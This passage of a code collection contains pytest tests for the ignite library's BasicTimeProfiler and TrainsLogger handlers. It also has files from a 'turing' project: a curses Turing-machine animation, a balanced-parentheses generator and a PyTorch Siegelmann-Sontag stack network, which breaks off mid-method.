assert event_results["total"] == approx(true_max_epochs * true_num_iters * true_event_handler_time, abs=1e-1)
def test_event_handler_total_time():
true_event_handler_time = 0.125
true_max_epochs = 1
true_num_iters = 1
profiler = BasicTimeProfiler()
dummy_trainer = Engine(_do_nothing_update_fn)
profiler.attach(dummy_trainer)
@dummy_trainer.on(Events.STARTED)
def delay_start(engine):
time.sleep(true_event_handler_time)
@dummy_trainer.on(Events.COMPLETED)
def delay_complete(engine):
time.sleep(true_event_handler_time)
@dummy_trainer.on(Events.EPOCH_STARTED)
def delay_epoch_start(engine):
time.sleep(true_event_handler_time)
@dummy_trainer.on(Events.EPOCH_COMPLETED)
def delay_epoch_complete(engine):
time.sleep(true_event_handler_time)
@dummy_trainer.on(Events.ITERATION_STARTED)
def delay_iter_start(engine):
time.sleep(true_event_handler_time)
@dummy_trainer.on(Events.ITERATION_COMPLETED)
def delay_iter_complete(engine):
time.sleep(true_event_handler_time)
@dummy_trainer.on(Events.GET_BATCH_STARTED)
def delay_get_batch_started(engine):
time.sleep(true_event_handler_time)
@dummy_trainer.on(Events.GET_BATCH_COMPLETED)
def delay_get_batch_completed(engine):
time.sleep(true_event_handler_time)
dummy_trainer.run(range(true_num_iters), max_epochs=true_max_epochs)
results = profiler.get_results()
event_results = results["event_handlers_stats"]
assert event_results["total_time"].item() == approx(true_event_handler_time * 8, abs=1e-1)
def test_write_results(dirname):
true_event_handler_time = 0.125
true_max_epochs = 3
true_num_iters = 2
profiler = BasicTimeProfiler()
dummy_trainer = get_prepared_engine(true_event_handler_time)
profiler.attach(dummy_trainer)
dummy_trainer.run(range(true_num_iters), max_epochs=true_max_epochs)
fp = os.path.join(dirname, "test_log.csv")
profiler.write_results(fp)
assert os.path.isfile(fp)
file_length = 0
with open(fp) as f:
for l in f:
file_length += 1
assert file_length == (true_max_epochs * true_num_iters) + 1
def test_print_results(capsys):
true_max_epochs = 1
true_num_iters = 5
profiler = BasicTimeProfiler()
dummy_trainer = get_prepared_engine(true_event_handler_time=0.0125)
profiler.attach(dummy_trainer)
dummy_trainer.run(range(true_num_iters), max_epochs=true_max_epochs)
BasicTimeProfiler.print_results(profiler.get_results())
captured = capsys.readouterr()
out = captured.out
assert "BasicTimeProfiler._" not in out
assert "nan" not in out
def test_get_intermediate_results_during_run(capsys):
true_event_handler_time = 0.0645
true_max_epochs = 2
true_num_iters = 5
profiler = BasicTimeProfiler()
dummy_trainer = get_prepared_engine(true_event_handler_time)
profiler.attach(dummy_trainer)
@dummy_trainer.on(Events.ITERATION_COMPLETED(every=3))
def log_results(_):
results = profiler.get_results()
profiler.print_results(results)
captured = capsys.readouterr()
out = captured.out
assert "BasicTimeProfiler._" not in out
assert "nan" not in out
assert " min/index: (0.0, " not in out, out
dummy_trainer.run(range(true_num_iters), max_epochs=true_max_epochs)
```
#### File: contrib/handlers/test_trains_logger.py
```python
import math
from unittest.mock import ANY, MagicMock, call
import pytest
import torch
import trains
from ignite.contrib.handlers.trains_logger import *
from ignite.engine import Engine, Events, State
from ignite.handlers import Checkpoint
def test_optimizer_params_handler_wrong_setup():
with pytest.raises(TypeError):
OptimizerParamsHandler(optimizer=None)
optimizer = MagicMock(spec=torch.optim.Optimizer)
handler = OptimizerParamsHandler(optimizer=optimizer)
mock_logger = MagicMock()
mock_engine = MagicMock()
with pytest.raises(RuntimeError, match="Handler OptimizerParamsHandler works only with TrainsLogger"):
handler(mock_engine, mock_logger, Events.ITERATION_STARTED)
def test_optimizer_params():
optimizer = torch.optim.SGD([torch.Tensor(0)], lr=0.01)
wrapper = OptimizerParamsHandler(optimizer=optimizer, param_name="lr")
mock_logger = MagicMock(spec=TrainsLogger)
mock_logger.trains_logger = MagicMock()
mock_engine = MagicMock()
mock_engine.state = State()
mock_engine.state.iteration = 123
wrapper(mock_engine, mock_logger, Events.ITERATION_STARTED)
mock_logger.trains_logger.report_scalar.assert_called_once_with(iteration=123, series="0", title="lr", value=0.01)
wrapper = OptimizerParamsHandler(optimizer, param_name="lr", tag="generator")
mock_logger = MagicMock(spec=TrainsLogger)
mock_logger.trains_logger = MagicMock()
wrapper(mock_engine, mock_logger, Events.ITERATION_STARTED)
mock_logger.trains_logger.report_scalar.assert_called_once_with(
iteration=123, series="0", title="generator/lr", value=0.01
)
def test_output_handler_with_wrong_logger_type():
wrapper = OutputHandler("tag", output_transform=lambda x: x)
mock_logger = MagicMock()
mock_engine = MagicMock()
with pytest.raises(RuntimeError, match="Handler OutputHandler works only with TrainsLogger"):
wrapper(mock_engine, mock_logger, Events.ITERATION_STARTED)
def test_output_handler_output_transform(dirname):
wrapper = OutputHandler("tag", output_transform=lambda x: x)
mock_logger = MagicMock(spec=TrainsLogger)
mock_logger.trains_logger = MagicMock()
mock_engine = MagicMock()
mock_engine.state = State()
mock_engine.state.output = 12345
mock_engine.state.iteration = 123
wrapper(mock_engine, mock_logger, Events.ITERATION_STARTED)
mock_logger.trains_logger.report_scalar.assert_called_once_with(
iteration=123, series="output", title="tag", value=12345
)
wrapper = OutputHandler("another_tag", output_transform=lambda x: {"loss": x})
mock_logger = MagicMock(spec=TrainsLogger)
mock_logger.trains_logger = MagicMock()
wrapper(mock_engine, mock_logger, Events.ITERATION_STARTED)
mock_logger.trains_logger.report_scalar.assert_called_once_with(
iteration=123, series="loss", title="another_tag", value=12345
)
def test_output_handler_metric_names(dirname):
wrapper = OutputHandler("tag", metric_names=["a", "b"])
mock_logger = MagicMock(spec=TrainsLogger)
mock_logger.trains_logger = MagicMock()
mock_engine = MagicMock()
mock_engine.state = State(metrics={"a": 12.23, "b": 23.45})
mock_engine.state.iteration = 5
wrapper(mock_engine, mock_logger, Events.ITERATION_STARTED)
assert mock_logger.trains_logger.report_scalar.call_count == 2
mock_logger.trains_logger.report_scalar.assert_has_calls(
[
call(title="tag", series="a", iteration=5, value=12.23),
call(title="tag", series="b", iteration=5, value=23.45),
],
any_order=True,
)
wrapper = OutputHandler("tag", metric_names=["a", "c"])
mock_engine = MagicMock()
mock_engine.state = State(metrics={"a": 55.56, "c": "Some text"})
mock_engine.state.iteration = 7
mock_logger = MagicMock(spec=TrainsLogger)
mock_logger.trains_logger = MagicMock()
with pytest.warns(UserWarning):
wrapper(mock_engine, mock_logger, Events.ITERATION_STARTED)
assert mock_logger.trains_logger.report_scalar.call_count == 1
mock_logger.trains_logger.report_scalar.assert_has_calls(
[call(title="tag", series="a", iteration=7, value=55.56)], any_order=True
)
# all metrics
wrapper = OutputHandler("tag", metric_names="all")
mock_logger = MagicMock(spec=TrainsLogger)
mock_logger.trains_logger = MagicMock()
mock_engine = MagicMock()
mock_engine.state = State(metrics={"a": 12.23, "b": 23.45})
mock_engine.state.iteration = 5
wrapper(mock_engine, mock_logger, Events.ITERATION_STARTED)
assert mock_logger.trains_logger.report_scalar.call_count == 2
mock_logger.trains_logger.report_scalar.assert_has_calls(
[
call(title="tag", series="a", iteration=5, value=12.23),
call(title="tag", series="b", iteration=5, value=23.45),
],
any_order=True,
)
def test_output_handler_both(dirname):
wrapper = OutputHandler("tag", metric_names=["a", "b"], output_transform=lambda x: {"loss": x})
mock_logger = MagicMock(spec=TrainsLogger)
mock_logger.trains_logger = MagicMock()
mock_engine = MagicMock()
mock_engine.state = State(metrics={"a": 12.23, "b": 23.45})
mock_engine.state.epoch = 5
mock_engine.state.output = 12345
wrapper(mock_engine, mock_logger, Events.EPOCH_STARTED)
assert mock_logger.trains_logger.report_scalar.call_count == 3
mock_logger.trains_logger.report_scalar.assert_has_calls(
[
call(title="tag", series="a", iteration=5, value=12.23),
call(title="tag", series="b", iteration=5, value=23.45),
call(title="tag", series="loss", iteration=5, value=12345),
],
any_order=True,
)
def test_output_handler_with_wrong_global_step_transform_output():
def global_step_transform(*args, **kwargs):
return "a"
wrapper = OutputHandler("tag", output_transform=lambda x: {"loss": x}, global_step_transform=global_step_transform)
mock_logger = MagicMock(spec=TrainsLogger)
mock_logger.trains_logger = MagicMock()
mock_engine = MagicMock()
mock_engine.state = State()
mock_engine.state.epoch = 5
mock_engine.state.output = 12345
with pytest.raises(TypeError, match="global_step must be int"):
wrapper(mock_engine, mock_logger, Events.EPOCH_STARTED)
def test_output_handler_with_global_step_from_engine():
mock_another_engine = MagicMock()
mock_another_engine.state = State()
mock_another_engine.state.epoch = 10
mock_another_engine.state.output = 12.345
wrapper = OutputHandler(
"tag",
output_transform=lambda x: {"loss": x},
global_step_transform=global_step_from_engine(mock_another_engine),
)
mock_logger = MagicMock(spec=TrainsLogger)
mock_logger.trains_logger = MagicMock()
mock_engine = MagicMock()
mock_engine.state = State()
mock_engine.state.epoch = 1
mock_engine.state.output = 0.123
wrapper(mock_engine, mock_logger, Events.EPOCH_STARTED)
assert mock_logger.trains_logger.report_scalar.call_count == 1
mock_logger.trains_logger.report_scalar.assert_has_calls(
[call(title="tag", series="loss", iteration=mock_another_engine.state.epoch, value=mock_engine.state.output)]
)
mock_another_engine.state.epoch = 11
mock_engine.state.output = 1.123
wrapper(mock_engine, mock_logger, Events.EPOCH_STARTED)
assert mock_logger.trains_logger.report_scalar.call_count == 2
mock_logger.trains_logger.report_scalar.assert_has_calls(
[call(title="tag", series="loss", iteration=mock_another_engine.state.epoch, value=mock_engine.state.output)]
)
def test_output_handler_with_global_step_transform():
def global_step_transform(*args, **kwargs):
return 10
wrapper = OutputHandler("tag", output_transform=lambda x: {"loss": x}, global_step_transform=global_step_transform)
mock_logger = MagicMock(spec=TrainsLogger)
mock_logger.trains_logger = MagicMock()
mock_engine = MagicMock()
mock_engine.state = State()
mock_engine.state.epoch = 5
mock_engine.state.output = 12345
wrapper(mock_engine, mock_logger, Events.EPOCH_STARTED)
assert mock_logger.trains_logger.report_scalar.call_count == 1
mock_logger.trains_logger.report_scalar.assert_has_calls(
[call(title="tag", series="loss", iteration=10, value=12345)]
)
def test_weights_scalar_handler_wrong_setup():
with pytest.raises(TypeError, match="Argument model should be of type torch.nn.Module"):
WeightsScalarHandler(None)
model = MagicMock(spec=torch.nn.Module)
with pytest.raises(TypeError, match="Argument reduction should be callable"):
WeightsScalarHandler(model, reduction=123)
with pytest.raises(ValueError, match="Output of the reduction function should be a scalar"):
WeightsScalarHandler(model, reduction=lambda x: x)
wrapper = WeightsScalarHandler(model)
mock_logger = MagicMock()
mock_engine = MagicMock()
with pytest.raises(RuntimeError, match="Handler WeightsScalarHandler works only with TrainsLogger"):
wrapper(mock_engine, mock_logger, Events.ITERATION_STARTED)
def test_weights_scalar_handler(dummy_model_factory):
model = dummy_model_factory(with_grads=True, with_frozen_layer=False)
# define test wrapper to test with and without optional tag
def _test(tag=None):
wrapper = WeightsScalarHandler(model, tag=tag)
mock_logger = MagicMock(spec=TrainsLogger)
mock_logger.trains_logger = MagicMock()
mock_engine = MagicMock()
mock_engine.state = State()
mock_engine.state.epoch = 5
wrapper(mock_engine, mock_logger, Events.EPOCH_STARTED)
tag_prefix = "{}/".format(tag) if tag else ""
assert mock_logger.trains_logger.report_scalar.call_count == 4
mock_logger.trains_logger.report_scalar.assert_has_calls(
[
call(title=tag_prefix + "weights_norm/fc1", series="weight", iteration=5, value=0.0),
call(title=tag_prefix + "weights_norm/fc1", series="bias", iteration=5, value=0.0),
call(title=tag_prefix + "weights_norm/fc2", series="weight", iteration=5, value=12.0),
call(title=tag_prefix + "weights_norm/fc2", series="bias", iteration=5, value=math.sqrt(12.0)),
],
any_order=True,
)
_test()
_test(tag="tag")
def test_weights_scalar_handler_frozen_layers(dummy_model_factory):
model = dummy_model_factory(with_grads=True, with_frozen_layer=True)
wrapper = WeightsScalarHandler(model)
mock_logger = MagicMock(spec=TrainsLogger)
mock_logger.trains_logger = MagicMock()
mock_engine = MagicMock()
mock_engine.state = State()
mock_engine.state.epoch = 5
wrapper(mock_engine, mock_logger, Events.EPOCH_STARTED)
mock_logger.trains_logger.report_scalar.assert_has_calls(
[
call(title="weights_norm/fc2", series="weight", iteration=5, value=12.0),
call(title="weights_norm/fc2", series="bias", iteration=5, value=math.sqrt(12.0)),
],
any_order=True,
)
with pytest.raises(AssertionError):
mock_logger.trains_logger.report_scalar.assert_has_calls(
[
call(title="weights_norm/fc1", series="weight", iteration=5, value=12.0),
call(title="weights_norm/fc1", series="bias", iteration=5, value=math.sqrt(12.0)),
],
any_order=True,
)
assert mock_logger.trains_logger.report_scalar.call_count == 2
def test_weights_hist_handler_wrong_setup():
with pytest.raises(TypeError, match="Argument model should be of type torch.nn.Module"):
WeightsHistHandler(None)
model = MagicMock(spec=torch.nn.Module)
wrapper = WeightsHistHandler(model)
mock_logger = MagicMock()
mock_engine = MagicMock()
with pytest.raises(RuntimeError, match="Handler 'WeightsHistHandler' works only with TrainsLogger"):
wrapper(mock_engine, mock_logger, Events.ITERATION_STARTED)
def test_weights_hist_handler(dummy_model_factory):
model = dummy_model_factory(with_grads=True, with_frozen_layer=False)
# define test wrapper to test with and without optional tag
def _test(tag=None):
wrapper = WeightsHistHandler(model, tag=tag)
mock_logger = MagicMock(spec=TrainsLogger)
mock_logger.grad_helper = MagicMock()
mock_engine = MagicMock()
mock_engine.state = State()
mock_engine.state.epoch = 5
wrapper(mock_engine, mock_logger, Events.EPOCH_STARTED)
tag_prefix = "{}/".format(tag) if tag else ""
assert mock_logger.grad_helper.add_histogram.call_count == 4
mock_logger.grad_helper.add_histogram.assert_has_calls(
[
call(title=tag_prefix + "weights_fc1", hist_data=ANY, series="weight", step=5),
call(title=tag_prefix + "weights_fc1", hist_data=ANY, series="bias", step=5),
call(title=tag_prefix + "weights_fc2", hist_data=ANY, series="weight", step=5),
call(title=tag_prefix + "weights_fc2", hist_data=ANY, series="bias", step=5),
],
any_order=True,
)
_test()
_test(tag="tag")
def test_weights_hist_handler_frozen_layers(dummy_model_factory):
model = dummy_model_factory(with_grads=True, with_frozen_layer=True)
wrapper = WeightsHistHandler(model)
mock_logger = MagicMock(spec=TrainsLogger)
mock_logger.grad_helper = MagicMock()
mock_engine = MagicMock()
mock_engine.state = State()
mock_engine.state.epoch = 5
wrapper(mock_engine, mock_logger, Events.EPOCH_STARTED)
mock_logger.grad_helper.add_histogram.assert_has_calls(
[
call(title="weights_fc2", hist_data=ANY, series="weight", step=5),
call(title="weights_fc2", hist_data=ANY, series="bias", step=5),
],
any_order=True,
)
with pytest.raises(AssertionError):
mock_logger.grad_helper.add_histogram.assert_has_calls(
[
call(title="weights_fc1", hist_data=ANY, series="weight", step=5),
call(title="weights_fc1", hist_data=ANY, series="bias", step=5),
],
any_order=True,
)
assert mock_logger.grad_helper.add_histogram.call_count == 2
def test_grads_scalar_handler_wrong_setup():
with pytest.raises(TypeError, match="Argument model should be of type torch.nn.Module"):
GradsScalarHandler(None)
model = MagicMock(spec=torch.nn.Module)
with pytest.raises(TypeError, match="Argument reduction should be callable"):
GradsScalarHandler(model, reduction=123)
wrapper = GradsScalarHandler(model)
mock_logger = MagicMock()
mock_engine = MagicMock()
with pytest.raises(RuntimeError, match="Handler GradsScalarHandler works only with TrainsLogger"):
wrapper(mock_engine, mock_logger, Events.ITERATION_STARTED)
def test_grads_scalar_handler(dummy_model_factory, norm_mock):
model = dummy_model_factory(with_grads=True, with_frozen_layer=False)
# define test wrapper to test with and without optional tag
def _test(tag=None):
wrapper = GradsScalarHandler(model, reduction=norm_mock, tag=tag)
mock_logger = MagicMock(spec=TrainsLogger)
mock_logger.trains_logger = MagicMock()
mock_engine = MagicMock()
mock_engine.state = State()
mock_engine.state.epoch = 5
norm_mock.reset_mock()
wrapper(mock_engine, mock_logger, Events.EPOCH_STARTED)
tag_prefix = "{}/".format(tag) if tag else ""
mock_logger.trains_logger.report_scalar.assert_has_calls(
[
call(
title=tag_prefix + "grads_norm/fc1", value=ANY, series="weight", iteration=mock_engine.state.epoch
),
call(title=tag_prefix + "grads_norm/fc1", value=ANY, series="bias", iteration=mock_engine.state.epoch),
call(
title=tag_prefix + "grads_norm/fc2", value=ANY, series="weight", iteration=mock_engine.state.epoch
),
call(title=tag_prefix + "grads_norm/fc2", value=ANY, series="bias", iteration=mock_engine.state.epoch),
],
any_order=True,
)
assert mock_logger.trains_logger.report_scalar.call_count == 4
assert norm_mock.call_count == 4
_test()
_test(tag="tag")
def test_grads_scalar_handler_frozen_layers(dummy_model_factory, norm_mock):
model = dummy_model_factory(with_grads=True, with_frozen_layer=True)
wrapper = GradsScalarHandler(model, reduction=norm_mock)
mock_logger = MagicMock(spec=TrainsLogger)
mock_logger.trains_logger = MagicMock()
mock_engine = MagicMock()
mock_engine.state = State()
mock_engine.state.epoch = 5
norm_mock.reset_mock()
wrapper(mock_engine, mock_logger, Events.EPOCH_STARTED)
mock_logger.trains_logger.report_scalar.assert_has_calls(
[
call(title="grads_norm/fc2", value=ANY, series="weight", iteration=mock_engine.state.epoch),
call(title="grads_norm/fc2", value=ANY, series="bias", iteration=mock_engine.state.epoch),
],
any_order=True,
)
with pytest.raises(AssertionError):
mock_logger.trains_logger.report_scalar.assert_has_calls(
[call(title="grads_norm/fc1", value=ANY, iteration=5), call("grads_norm/fc1", ANY, 5)], any_order=True
)
assert mock_logger.trains_logger.report_scalar.call_count == 2
assert norm_mock.call_count == 2
def test_grads_hist_handler_wrong_setup():
with pytest.raises(TypeError, match="Argument model should be of type torch.nn.Module"):
GradsHistHandler(None)
model = MagicMock(spec=torch.nn.Module)
wrapper = GradsHistHandler(model)
mock_logger = MagicMock()
mock_engine = MagicMock()
with pytest.raises(RuntimeError, match="Handler 'GradsHistHandler' works only with TrainsLogger"):
wrapper(mock_engine, mock_logger, Events.ITERATION_STARTED)
def test_grads_hist_handler(dummy_model_factory):
model = dummy_model_factory(with_grads=True, with_frozen_layer=False)
# define test wrapper to test with and without optional tag
def _test(tag=None):
wrapper = GradsHistHandler(model, tag=tag)
mock_logger = MagicMock(spec=TrainsLogger)
mock_logger.grad_helper = MagicMock()
mock_engine = MagicMock()
mock_engine.state = State()
mock_engine.state.epoch = 5
wrapper(mock_engine, mock_logger, Events.EPOCH_STARTED)
tag_prefix = "{}/".format(tag) if tag else ""
assert mock_logger.grad_helper.add_histogram.call_count == 4
mock_logger.grad_helper.add_histogram.assert_has_calls(
[
call(title=tag_prefix + "grads_fc1", hist_data=ANY, series="weight", step=5),
call(title=tag_prefix + "grads_fc1", hist_data=ANY, series="bias", step=5),
call(title=tag_prefix + "grads_fc2", hist_data=ANY, series="weight", step=5),
call(title=tag_prefix + "grads_fc2", hist_data=ANY, series="bias", step=5),
],
any_order=True,
)
_test()
_test(tag="tag")
def test_grads_hist_frozen_layers(dummy_model_factory):
model = dummy_model_factory(with_grads=True, with_frozen_layer=True)
wrapper = GradsHistHandler(model)
mock_logger = MagicMock(spec=TrainsLogger)
mock_logger.grad_helper = MagicMock()
mock_engine = MagicMock()
mock_engine.state = State()
mock_engine.state.epoch = 5
wrapper(mock_engine, mock_logger, Events.EPOCH_STARTED)
assert mock_logger.grad_helper.add_histogram.call_count == 2
mock_logger.grad_helper.add_histogram.assert_has_calls(
[
call(title="grads_fc2", hist_data=ANY, series="weight", step=5),
call(title="grads_fc2", hist_data=ANY, series="bias", step=5),
],
any_order=True,
)
with pytest.raises(AssertionError):
mock_logger.grad_helper.add_histogram.assert_has_calls(
[
call(title="grads_fc1", hist_data=ANY, series="weight", step=5),
call(title="grads_fc1", hist_data=ANY, series="bias", step=5),
],
any_order=True,
)
def test_integration(dirname):
n_epochs = 5
data = list(range(50))
losses = torch.rand(n_epochs * len(data))
losses_iter = iter(losses)
def update_fn(engine, batch):
return next(losses_iter)
trainer = Engine(update_fn)
TrainsLogger.set_bypass_mode(True)
logger = TrainsLogger(output_uri=dirname)
def dummy_handler(engine, logger, event_name):
global_step = engine.state.get_event_attrib_value(event_name)
logger.trains_logger.report_scalar(title="", series="", value="test_value", iteration=global_step)
logger.attach(trainer, log_handler=dummy_handler, event_name=Events.EPOCH_COMPLETED)
trainer.run(data, max_epochs=n_epochs)
logger.close()
def test_integration_as_context_manager(dirname):
n_epochs = 5
data = list(range(50))
losses = torch.rand(n_epochs * len(data))
losses_iter = iter(losses)
def update_fn(engine, batch):
return next(losses_iter)
TrainsLogger.set_bypass_mode(True)
with TrainsLogger(output_uri=dirname) as trains_logger:
trainer = Engine(update_fn)
def dummy_handler(engine, logger, event_name):
global_step = engine.state.get_event_attrib_value(event_name)
logger.trains_logger.report_scalar(title="", series="", value="test_value", iteration=global_step)
trains_logger.attach(trainer, log_handler=dummy_handler, event_name=Events.EPOCH_COMPLETED)
trainer.run(data, max_epochs=n_epochs)
def test_trains_disk_saver_integration():
model = torch.nn.Module()
to_save_serializable = {"model": model}
mock_logger = MagicMock(spec=TrainsLogger)
trains_saver = TrainsSaver(mock_logger)
trains.binding.frameworks.WeightsFileHandler.create_output_model = MagicMock()
checkpoint = Checkpoint(to_save=to_save_serializable, save_handler=trains_saver, n_saved=1)
trainer = Engine(lambda e, b: None)
trainer.state = State(epoch=0, iteration=0)
checkpoint(trainer)
trainer.state.iteration = 1
checkpoint(trainer)
assert trains.binding.frameworks.WeightsFileHandler.create_output_model.call_count == 2
```
{
"source": "jonrbates/turing",
"score": 3
}
#### File: turing/scripts/make_turing_machine_animation.py
```python
import curses
from time import sleep
from turing.wcm.simulator import Simulator
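# Note added for clarity (an assumption, not stated in the original script): the
# Simulator's `delta` is read below as a transition table mapping
# (state, scanned_symbol) -> (next_state, symbol_to_write, head_move),
# with head_move being an integer offset such as -1, 0, or +1.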
def render(tape, state, head):
cursor = "^"
pad = 1
stdscr.clear()
# show tape
pos = pad
l = "tape: "
stdscr.addstr(pad, pos, l, curses.A_DIM)
pos += len(l)
l = tape
stdscr.addstr(pad, pos, l)
# show head
pos = pad
l = "head: "
stdscr.addstr(pad+1, pos, l, curses.A_DIM)
pos += len(l) + head
l = cursor
stdscr.addstr(pad+1, pos, l, curses.color_pair(1) | curses.A_BOLD)
# show state
pos = pad
l = "state: "
stdscr.addstr(pad+2, pos, l, curses.A_DIM)
pos += len(l)
l = state
stdscr.addstr(pad+2, pos, state, curses.color_pair(2))
stdscr.refresh()
tx = Simulator()
delta = tx.delta
tape = "B()((()(()))())E"
head = 0
state = "I"
n = len(tape)
final_states = ["T", "F"]
try:
stdscr = curses.initscr()
curses.curs_set(0)
curses.start_color()
curses.init_pair(1, curses.COLOR_CYAN, curses.COLOR_BLACK)
curses.init_pair(2, curses.COLOR_YELLOW, curses.COLOR_BLACK)
sleep(3)
while state not in final_states:
render(tape, state, head)
# update
(state, write, move) = delta[(state, tape[head])]
# write
tape = tape[:head] + write + tape[head+1:]
# move
head += move
sleep(.3)
render(tape, state, head)
sleep(.3)
finally:
curses.echo()
curses.nocbreak()
curses.endwin()
```
#### File: src/turing/balanced_parentheses.py
```python
def generate_balanced_parentheses(n: int):
"""generate all balanced parentheses strings of length 2n
copied this from leetcode :)
"""
ans = []
def backtrack(S = [], left = 0, right = 0):
if len(S) == 2 * n:
ans.append("".join(S))
return
if left < n:
S.append("(")
backtrack(S, left+1, right)
S.pop()
if right < left:
S.append(")")
backtrack(S, left, right+1)
S.pop()
backtrack()
return ans
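# Minimal usage sketch added for illustration (not part of the original module);
# for n = 2 the backtracking above should produce ["(())", "()()"].
if __name__ == "__main__":
    for s in generate_balanced_parentheses(2):
        print(s)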
```
#### File: turing/ss/networks.py
```python
import torch
from itertools import product
from torch import Tensor
from torch.nn import (
Module,
Linear,
Parameter
)
from turing.functional import saturated_relu
from typing import Tuple
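# Note added for clarity (an assumption about the imported helper, not taken from
# this file): `saturated_relu` is treated here as the saturated-linear activation
# used throughout the Siegelmann-Sontag construction, roughly
#     def saturated_relu(x: Tensor) -> Tensor:
#         return torch.clamp(x, min=0.0, max=1.0)
# The authoritative definition lives in turing/functional.py.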
class SiegelmannSontag1(Module):
"""TODO:
"""
def __init__(self, s: int, p: int):
super().__init__()
self.s = s
self.p = p
# configuration detector
self.configuration_detector = ConfigurationDetector1(s, p)
# aggregate sub to full
w = torch.zeros(p, 4*p)
for k in range(p):
w[k, 4*k:4*k+4] = 1
linear = Linear(4*p, p, bias=False)
linear.weight = Parameter(w)
self.linear_stack = linear
self.linear_top = linear
# linear combine configuration detectors
self.beta = Linear(s * 9**p, s, bias=False)
self.gamma = Linear(s * 9**p, 4*p, bias=False)
# linear next substack
w = torch.zeros(4*p, p)
b = torch.zeros(4*p,)
for i in range(p):
# noop
j = 0
w[4*i+j, i] = 1
b[4*i+j] = 0
# push0
j = 1
w[4*i+j, i] = 1/(10*p**2)
b[4*i+j] = (10*p**2-4*p-1)/(10*p**2)
# push1
j = 2
w[4*i+j, i] = 1/(10*p**2)
b[4*i+j] = (10*p**2-1)/(10*p**2)
# pop
j = 3
w[4*i+j, i] = 10*p**2
b[4*i+j] = -10*p**2+4*p+1
linear = Linear(4*p, p)
linear.weight = Parameter(w)
linear.bias = Parameter(b)
self.next_sub_stack = linear
# linear next subtop
w = torch.zeros(4*p, p)
for i in range(p):
j = 3
w[4*i+j, i] = -4
linear = Linear(4*p, p, bias=False)
linear.weight = Parameter(w)
self.next_sub_top = linear
# linear_st; eq (25)
w = (2*p+1)*10*p**2 * torch.eye(4*p)
b = -(2*p+1)*(10*p**2-2) * torch.ones(4*p,)
linear = Linear(4*p, 4*p)
linear.weight = Parameter(w)
linear.bias = Parameter(b)
self.linear_st = linear
# linear_sn; eq (26)
w = 10*p**2 * torch.eye(4*p)
b = -(10*p**2-4*p-2) * torch.ones(4*p,)
linear = Linear(4*p, 4*p)
linear.weight = Parameter(w)
linear.bias = Parameter(b)
self.linear_sn = linear
def forward(self, x: Tensor):
s, p = self.s, self.p
# current main layer
st_, subs_, subt_, subn_ = 0, s, s+4*p, s+8*p
state = x[st_:subs_]
noisy_sub_stack = x[subs_:subt_]
noisy_sub_top = x[subt_:subn_]
noisy_sub_nonempty = x[subn_:]
# hidden layer
w = torch.cat([
noisy_sub_top,
noisy_sub_nonempty,
state
])
cd_out = self.configuration_detector(w)
sub_stack = saturated_relu(noisy_sub_stack)
sub_top = saturated_relu(noisy_sub_top)
stack = self.linear_stack(sub_stack)
top = self.linear_top(sub_top)
# next main layer
next_state = self.beta(cd_out)
# eq (24)
next_noisy_sub_stack = self.next_sub_stack(stack)\
+ self.next_sub_top(top)\
+ self.gamma(cd_out) - 1
next_noisy_sub_top = self.linear_st(next_noisy_sub_stack)
next_noisy_sub_nonempty = self.linear_sn(next_noisy_sub_stack)
o = torch.cat([
next_state,
next_noisy_sub_stack,
next_noisy_sub_top,
next_noisy_sub_nonempty
])
return o
def fit(self, delta, z2i, states, alphabet, fallback_next_state_and_action=('F', 'noop', 'noop')):
"""
TODO
Create datapoints to set beta, gamma
"""
# y = self._generate_y(delta, z2i, states, alphabet, i2b, fallback_next_state_and_action)
# x = self.configuration_detector.linear.weight.detach()
# h = self.configuration_detector(x)
p, s = self.p, self.s
grid_size = len(delta)*4**p
low_value = (-8*p**2+2)
y = torch.zeros(grid_size, 4*p+s)
x = low_value * torch.ones(grid_size, 8*p+s)
row = 0
for _, ((z, top_0, top_1), (z_next, action_1, action_2)) in enumerate(delta.items()):
substack_action_indicator = torch.zeros(4*p)
for k, action in enumerate([action_1, action_2]):
offset = self.map_action(action)
substack_action_indicator[4*k+offset] = 1
d = self.noisy_sampler((top_0, top_1))
# generate various inputs corresponding to the current key
for i in self.configuration_detector.generate_i():
# we skip None cases, so this is just combinations of substack 4^p
if None in i: continue
# set x
x[row, 8*p+z2i[z]] = 1
slice = self.configuration_detector.convert_to_tensor_indices(i)
x[row, slice] = d
# set y
y[row, 4*p+z2i[z_next]] = 1
y[row, :4*p] = substack_action_indicator
row += 1
h = self.configuration_detector(x)
beta, gamma = self._solve_for_beta_and_gamma(h, y)
self.beta.weight = Parameter(beta)
self.gamma.weight = Parameter(gamma)
def _sample(self, top):
"""See range table; p. 145
"""
p = self.p
if top == 1:
return 2*p+1, 4*p+1
elif top == 0:
return -8*p**2+2, 1
        elif top is None:
return -20*p**3-10*p**2+4*p+2, -10*p**2+4*p+2
def noisy_sampler(self, tops):
"""Sample d (the meaningful values?) of Lemma 6.2
See range table; p. 145
"""
# a_1, a_2, i2b[b_1], i2b[b_2]
sampled_top, sampled_nonempty = tuple(zip(*map(self._sample, tops)))
return torch.Tensor(sampled_top + sampled_nonempty)
@staticmethod
def map_action(action: str):
if action == 'push 0':
offset = 1
elif action == 'push 1':
offset = 2
elif action == 'pop':
offset = 3
else:
# noop
offset = 0
return offset
def _solve_for_beta_and_gamma(self, h, y):
"""TODO:
"""
p = self.p
U, S, Vh = torch.linalg.svd(h.detach(), full_matrices=False)
C = (Vh.T @ torch.inverse(torch.diag(S)) @ U.T @ y).T
return C[4*p:,:], C[:4*p,:]
class ConfigurationDetector1(Module):
"""TODO:
\beta(d_1^(1),...,d_t^(r)) x = \sum_{i \in I} c_i \sigma(v_i^T \mu_i)
"""
def __init__(self, s: int, p: int):
super().__init__()
# number of states
self.s = s
# number of stacks
self.p = p
w = torch.zeros(s * 9**p, 8*p+s)
b = torch.zeros(s * 9**p, )
counter = 0
for i, z in self.generate_i_z():
slice = self.convert_to_tensor_indices(i)
k = len(slice)
if k == 0:
# state weight
w[counter, 8*p+z] = 1
else:
# top, nonempty weights
w[counter, slice] = 1
# state weight
w[counter, 8*p+z] = k*(4*p+2)
# bias
b[counter] = -k*(4*p+2)
counter += 1
linear = Linear(8*p+s, s * 9**p)
linear.weight = Parameter(w)
linear.bias = Parameter(b)
self.linear = linear
def forward(self, x):
return saturated_relu(self.linear(x))
def generate_i_z(self):
for i in self.generate_i():
for z in range(self.s):
yield i, z
def generate_i(self):
"""Generate multi-index from {None, 0, 1, 2, 3}^{2p},
skip invalid multi-indices
"""
# substack indices
subs = (None, 0, 1, 2, 3)
# choose i_nonempty first
